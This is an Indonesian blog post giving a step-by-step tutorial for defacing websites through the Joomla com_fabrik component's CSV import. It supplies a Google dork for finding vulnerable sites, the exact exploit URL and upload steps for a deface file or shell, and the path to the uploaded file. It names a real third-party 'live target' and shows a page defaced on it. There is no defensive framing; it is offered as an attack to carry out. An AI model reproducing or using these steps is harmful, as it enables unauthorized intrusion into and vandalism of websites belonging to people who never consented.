Selasa, 11 November 2014

Deface Dengan Exploit Com_Fabrik

Cara yang satu ini cukup mudah dilakukan. Dengan menggunakan exploit com_fabrik, kita bisa mengupload shell kita untuk melakukan deface terhadap web tersebut. Ok simak tutorial berikut.

Live Target : http://www.media8.ru/

1. Ketik dork berikut ke google : 
inurl:index.php?option=com_fabrik

2. Akan ada banyak web, anda buka terserah yang mana

3. Masukkan exploit ini : 

index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh : www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

4. Jika tidak berhasil cari target lain. Jika berhasil akan muncul form upload seperti ini
5. Klik "Choose File" untuk memilih File Deface, dan klik "Import CSV untuk mengupload

6. Jika berhasil, buka shell anda dengan format 
www.site.com/media/namafile.html

7. Dan muncullah file deface kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.

8. contoh nya  http://www.media8.ru/media/ve.html B|

Selamat Siang

0 komentar:

Posting Komentar

Wahyu © 2008 Template by:
SkinCorner